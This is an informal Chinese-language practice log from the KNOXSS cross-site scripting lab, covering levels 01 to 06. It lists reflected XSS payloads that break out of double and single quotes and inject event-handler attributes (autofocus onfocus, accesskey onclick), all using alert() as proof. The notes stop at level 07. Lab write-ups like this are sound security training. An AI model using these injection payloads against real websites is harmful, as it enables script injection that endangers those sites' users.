XSS靶场实战(工作wuwuwu)
knoxss
knoxss
Single Reflection Using QUERY of URL
——01
测试标签
<script>alert(666666)</script>
——02: "
<h1>test</h1>
没有反应,查看源码
现在需要闭合双引号,我计划还是先搞标签
"><h1>test</h1>
标签上:
"><script>alert(666666)</script>
——03: ’
<h1>test</h1>
闭合","被实体编码
'闭合
'>来闭合
'><h1>test</h1>
不多的时候:
标签上:
'><script>alert(666666)</script>
——04:" + input属性
<h1>test</h1>
"闭合
发现"闭合了,但是标签无法被闭合,只能看属性
找到 input 对应的xss属性
<input autofocus onfocus=alert(1)>
使用
"autofocus onfocus=alert(1) b="
刷新页面就触发!
——05: ’ + input
"闭合
‘闭合
闭合,但是 > 被实体编码
属性
' autofocus onfocus=alert(1) b="
'后面是否有空格 都行
——06
页面看不到
①源码搜索到:
再去前面找到对应的,未来edit as html
②直接搜索也可(ctrl + F)
<h1>test</h1>
"闭合
使用属性
" autofocus onfocus=alert(1) b="
自己赋值了,没有找到其他属性,找到了也由于 type=“hidden” 搞不了
type="hidden"如何xss:
ai
浏览器搜索都没有帮我解决
最接近成功的方案:
“accesskey=“X”%20οnclick=“alert(6666)”%20b=”
alt+X触发
——07
